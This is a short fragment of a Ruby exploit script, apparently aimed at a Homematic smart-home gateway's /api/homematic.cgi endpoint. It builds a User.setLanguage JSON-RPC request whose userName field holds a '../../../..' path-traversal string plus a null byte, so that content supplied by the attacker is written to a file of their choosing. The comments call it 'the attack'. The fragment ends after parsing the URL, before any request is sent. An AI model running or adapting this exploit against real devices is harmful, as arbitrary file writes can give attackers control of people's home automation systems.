# The first argument specifiee the URL and if http or https is used
url = ARGV[0] + "/api/homematic.cgi"
# The second argument specifies the file into which the content should be written
homematic_file_path = ARGV[1]
# The third argument specifies the content of the file
homematic_file_content = ARGV[2]
# define the json body for the attack
body = {
"version": "1.1",
"method": "User.setLanguage",
"params": {
"userName": "file path",
"userLang": "file content"
}
}.to_hash
# define the traversal with the file you want to write
body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"
# define the content
body[:params][:userLang] = homematic_file_content
# split the uri to access it in a easier way
uri = URI.parse(url)